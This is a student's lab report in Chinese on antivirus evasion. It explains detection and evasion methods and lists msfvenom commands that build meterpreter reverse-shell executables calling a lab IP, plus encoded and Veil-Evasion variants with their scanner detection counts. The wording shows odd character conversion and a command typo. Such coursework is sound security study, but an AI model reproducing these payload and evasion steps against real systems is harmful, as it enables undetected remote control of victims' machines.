20145338 索朗卓嘎 《網絡攻防》 免殺原理與實踐

20145338 索朗卓嘎《網絡攻防》 免殺原理與實踐

實踐內容：

(1)理解免殺技術原理(1分)
(2)正確使用msf編碼器，veil-evasion，本身利用shellcode編程等免殺工具或技巧；(2分)
(3)經過組合應用各類技術實現惡意代碼免殺(1分)
(4)用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本（1分）

報告內容：

`基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？
根據特徵來檢測：對已存在的流行代碼特徵的提取與比對
根據行爲來檢測：是否有更改註冊表行爲、是否有設置自啓動、是否有修改權限等等
（2）免殺是作什麼？
免殺顧名思義就是免除計算機殺軟的查殺。
經過一些手段來瞞過殺軟的檢測掃描。
（3）免殺的基本方法有哪些？
加花指令：就是加入一些花裏胡哨的指令來迷惑殺軟，讓殺軟檢測不到特徵碼，好比+1，-1，*1，/1什麼的，可是一些厲害的殺軟還能夠看破這些。
加殼：就是給含有惡意代碼的程序加一個外包裝，讓殺軟不知道里面裝的是什麼。可是這種方法逃不過內存查殺，一運行起來就會露出馬腳。
修改特徵碼：就是在不影響程序功能的狀況下，將殺軟檢測的那一段特徵碼改一下，從而瞞過殺軟的檢測。固然修改特徵碼不是一個容易的事情，可是倒是惟一能夠躲過內存查殺的辦法。
`實踐體會
作實驗老是幾經波折，謝謝在實驗過程當中不不厭其煩耐心幫助個人同窗。經過此次實驗瞭解了幾種免殺技術，實驗中使用了不少種殺毒軟件，但可以真正殺毒成功的卻只有幾個，因此平時在使用電腦的時候真須要謹慎，不點開不明連接以及在正規網站下載軟件，不能過度依賴殺毒軟件，本身日常中也要多加註意。

實踐過程

·首先使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.164 PORT=5338-f exe > slzgtest.exe生成meterpreter可執行文件。

接着利用http://www.virscan.org/這個網站檢測一下有多少查毒軟件能夠將其查殺出來，發現39個殺毒軟件中有21能夠發現病毒。

·Msfvenom使用編碼器生成meterpreter可執行文件
使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.43.164 LPORT= 5338-f exe > sltest.exe命令生成編碼過的可執行文件sltest.exe。

上傳生成的可執行文件sltest.exe，發現39個殺毒軟件其中20個軟件發現有病毒.

使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.43.164 LPORT=5338 -f exe >slzg2.exe命令生成編碼過的可執行文件slzg23test.exe


發如今39個殺毒軟件中有22個軟件發現有病毒.
·使用Veil-Evasion生成可執行文件
在kali中輸入指令veil-evasion 進入Veil-Evasion
用python語言來編寫。


在kali計算機的/var/lib/veil-evasion/output/compiled/文件夾裏找到db.exe的文件夾，而且移動至win系統中。

經過上傳軟件發現39個殺毒軟件中只有9個軟件發現有病毒，相對於以前使用的兩個方法相比這個的免殺效果更好。